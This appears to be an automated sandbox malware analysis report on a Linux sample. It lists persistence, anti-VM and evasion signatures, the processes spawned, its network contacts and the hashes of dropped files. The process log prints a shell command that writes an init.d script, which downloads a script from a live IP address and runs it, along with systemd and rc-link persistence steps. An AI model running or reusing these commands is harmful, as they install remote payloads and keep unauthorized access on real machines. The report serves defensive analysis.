Malware Analysis Report

2025-05-28 20:29

Sample ID 241125-k7m8hsyrgx
Target 19991040084.zip
SHA256 35cd367a1fb9c6d29e748b51e42ed8ceee321a1f874aafacc4af3e663049234f
Tags
antivm defense_evasion discovery persistence privilege_escalation
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

35cd367a1fb9c6d29e748b51e42ed8ceee321a1f874aafacc4af3e663049234f

Threat Level: Known bad

The file 19991040084.zip was found to be: Known bad.

Malicious Activity Summary

antivm defense_evasion discovery persistence privilege_escalation

yara_template

File and Directory Permissions Modification

Modifies Watchdog functionality

Checks mountinfo of local process

Creates/modifies environment variables

Modifies init.d

Modifies rc script

Modifies systemd

Modifies Bash startup script

Changes its process name

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-25 09:14

Signatures

yara_template

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-25 09:14

Reported

2024-11-25 09:17

Platform

ubuntu2404-amd64-20240729-en

Max time kernel

148s

Max time network

128s

Command Line

[/tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/sh N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /bin/sh N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /bin/sh N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/watchdog /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 N/A
File opened for modification /dev/misc/watchdog /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 N/A

Checks mountinfo of local process

antivm
Description Indicator Process Target
File opened for reading /proc/2655/mountinfo /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 N/A

Creates/modifies environment variables

persistence privilege_escalation defense_evasion
Description Indicator Process Target
File opened for modification /etc/profile /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 N/A

Modifies init.d

persistence
Description Indicator Process Target
File opened for modification /etc/init.d/system /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 N/A
File opened for modification /etc/init.d/sh /bin/sh N/A

Modifies rc script

persistence
Description Indicator Process Target
File opened for modification /etc/rc.local /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 N/A

Modifies systemd

persistence privilege_escalation
Description Indicator Process Target
File opened for modification /etc/systemd/system/custom.service /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 N/A

Modifies Bash startup script

persistence
Description Indicator Process Target
File opened for modification /etc/profile /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself N/A /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/status /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 N/A
File opened for reading /proc/1/cgroup /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 N/A
File opened for reading /proc/filesystems /usr/bin/systemctl N/A
File opened for reading /proc/filesystems /usr/bin/mkdir N/A

Processes

/tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911

[/tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911]

/bin/sh

[sh -c systemctl enable custom.service >/dev/null 2>&1]

/usr/bin/systemctl

[systemctl enable custom.service]

/bin/sh

[sh -c chmod +x /etc/init.d/system >/dev/null 2>&1]

/usr/bin/chmod

[chmod +x /etc/init.d/system]

/bin/sh

[sh -c ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1]

/usr/bin/ln

[ln -s /etc/init.d/system /etc/rcS.d/S99system]

/bin/sh

[sh -c echo "#!/bin/sh # /etc/init.d/sh case \"$1\" in start) echo 'Starting sh' /bin/sh & wget http://193.143.1.70/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping sh' killall sh ;; restart) $0 stop $0 start ;; *) echo \"Usage: $0 {start|stop|restart}\" exit 1 ;; esac exit 0" > /etc/init.d/sh]

/bin/sh

[sh -c chmod +x /etc/init.d/sh >/dev/null 2>&1]

/usr/bin/chmod

[chmod +x /etc/init.d/sh]

/bin/sh

[sh -c mkdir -p /etc/rc.d >/dev/null 2>&1]

/usr/bin/mkdir

[mkdir -p /etc/rc.d]

/bin/sh

[sh -c ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1]

/usr/bin/ln

[ln -s /etc/init.d/sh /etc/rc.d/S99sh]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 154.216.19.139:199 tcp
US 154.216.19.139:199 tcp
US 154.216.19.139:199 tcp
RU 193.143.1.70:38242 tcp
US 166.221.116.6:23 tcp
JP 126.40.23.30:23 tcp
DE 94.219.168.205:23 tcp
SG 170.165.2.86:23 tcp
NL 83.96.228.126:23 tcp
JP 202.244.30.63:23 tcp
US 162.236.109.110:23 tcp
UA 95.133.98.202:23 tcp
LT 158.129.189.242:23 tcp
CA 20.116.227.186:23 tcp
US 12.248.212.11:23 tcp
QA 89.211.5.75:23 tcp
US 32.107.0.197:23 tcp
CA 64.10.68.86:23 tcp
GB 2.123.80.70:23 tcp
US 169.94.192.89:23 tcp
TH 115.87.169.192:23 tcp
US 66.94.65.23:23 tcp
US 7.223.141.230:23 tcp
US 50.168.146.255:23 tcp
DE 2.174.123.99:23 tcp
TW 34.81.97.21:23 tcp
US 153.59.50.201:23 tcp
US 170.97.182.53:23 tcp
IT 45.205.17.68:23 tcp
US 71.26.7.137:23 tcp
KR 169.217.198.60:23 tcp
US 168.207.146.101:23 tcp
TW 111.252.41.220:23 tcp
US 134.150.237.12:23 tcp
JP 210.88.114.210:23 tcp
GB 109.234.225.10:23 tcp
GB 90.214.188.164:23 tcp
JP 118.236.246.228:23 tcp
US 55.185.57.127:23 tcp
CN 113.87.157.50:23 tcp
US 76.86.186.216:23 tcp
JP 126.24.240.187:23 tcp
US 97.99.30.139:23 tcp
FR 195.220.72.202:23 tcp
US 130.207.137.55:23 tcp

Files

/etc/systemd/system/custom.service

MD5 19a440fdac7f578f2fb33719698a082c
SHA1 ebadce21c65d05ad62a324deb39c57aecd3edf2c
SHA256 b176d41b748466f8ba35246c78a1c940f65403b363c086ccd5b5de577a87cf69
SHA512 8bdfac90e7235fc35eeec141a1e2145ed4ea5a250b71bdf0cf0e5e5aa59ab6dc004dc08561bd5547c4a4a106138c98950dc2098c905ce785b9b2c0657684d7bb

/etc/inittab

MD5 3d6b6e1b05ad5d0538ccd8804bcd279b
SHA1 0fc061b51c225d5bea072c939de05e8a856558bc
SHA256 cab2df9c1c498df29445837610f14ae08d4af98d3acac69b0581c01fe594e3c5
SHA512 1957857cffbc0d526eb04e40db166d661b9dc59fc31fb5551f31cd58d270f839ffa2098e81c8555b12e9dbd55ba17df662b14c6441a6389eb9a76082fa401c98

/boot/bootcmd

MD5 735cae7d3cbab0f59d95f84790282103
SHA1 1cb77931b3097f18988016c9ceba3280a5ccb2ae
SHA256 dfdd4cf729384e4ed52516ab72bd86be286c80f53d4f5b764fd2dd2a2b2c983b
SHA512 998daa467c4ee63dd41515897728de70cbb9c579ca8b16c26d8e6db5edad53c6dbd6343fb10eda3dbc29b0cb1fa72a9b2653250e9027e6ee02d17726e958bbfe

/etc/init.d/system

MD5 f000251d92c773cc3ee1ca22cf5f0788
SHA1 e2386fe6a5f29b1e9e5ad5b38928c024f97105e6
SHA256 31a77745dd3724a0691a9255738b9c87516868932e3eb992e2afafcd0574a985
SHA512 0dad5adaa7742dd208596fefad53ab21c39fbf2cbe5c9958b92170d555d316f0a0b02ec5236311b869aa18e90592e81439a3a229bf1307b5daf87d87c5f493c2

/etc/init.d/sh

MD5 c5583b6a699f62cb0a004c99842f5c70
SHA1 b232ef89bf9b36643b5956aaacfd295b9ce2a0a7
SHA256 2b03c83558e4af71f3b35408cf668a2ee06931c21adec760952a21a11bc4c59b
SHA512 a9fc1e4c30452a3d100a8ccfbb707d9d323830fbbca90c98d3c126bf943539baaf1fccb04d435a4b627ed7f1bfb1bbd649dab282488d951dde87e097423e154d

/etc/motd

MD5 2bd9b4be30579e633fc0191aa93df486
SHA1 7d63a9bd9662e86666b27c1b50db8e7370c624ff
SHA256 64dc39f3004dc93c9fc4f1467b4807f2d8e3eb0bfa96b15c19cd8e7d6fa77a1d
SHA512 ae6dd7b39191354cf43cf65e517460d7d4c61b8f5c08e33e6ca3c451dc7cab4de89f33934c89396b80f1aade0a4e2571bd5ae8b76ef80b737d4588703d2814d5